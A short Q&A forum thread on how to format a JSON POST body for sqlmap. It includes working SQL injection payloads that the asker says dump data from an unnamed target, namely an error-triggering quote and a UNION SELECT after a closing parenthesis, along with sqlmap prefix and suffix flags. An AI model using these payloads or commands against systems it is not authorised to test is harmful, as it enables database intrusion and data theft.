Custom post data JSON payload format in sqlmap?

Question

I want to perform SQL injection but I don't know how to use the command. So far, I have tried this:

--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv`

I use ' instead of " in parameter because sqlmap post data should be in --data="paramter goes here" format.

But last verbose show:

{'user_id':'6','\'user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#''}

It should be:

{'user_id':'6','user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#'}

Here is my manual way:

{"user_id":"6","user_with":"5"} -> return normal
{"user_id":"6","user_with":"5'"} -> return `You have an error...`
{"user_id":"6","user_with":"5 OR user_to = 5) union select version(),2,3,4,5,6#"} -> return dump data

So how to perform what I want in sqlmap?

score 0 · Answer 1 · answered Jan 15 '19 at 16:16

sqlmap automatically detects the json payload and tries to inject so instead of the above mentioned payload like:-

--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv`

use the following payload:-

--data="{\"user_id\":\"6\",\"user_with:5\"}" --prefix=" OR user_to = 5)" --suffix="#" -vvv`

you need not use ' instead of " to use json parameter with sqlmap just escape is enough.

Custom post data JSON payload format in sqlmap?

1 Answers1